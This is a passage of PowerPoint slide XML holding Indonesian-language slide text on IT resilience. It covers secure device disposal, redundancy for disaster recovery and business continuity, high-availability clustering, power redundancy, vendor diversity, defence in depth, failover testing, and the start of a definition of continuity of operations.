              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didaur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</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157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199915248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Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (COOP), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengelompokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanjutkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, uji failover, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kesinambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontinuitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (COOP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanjutkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
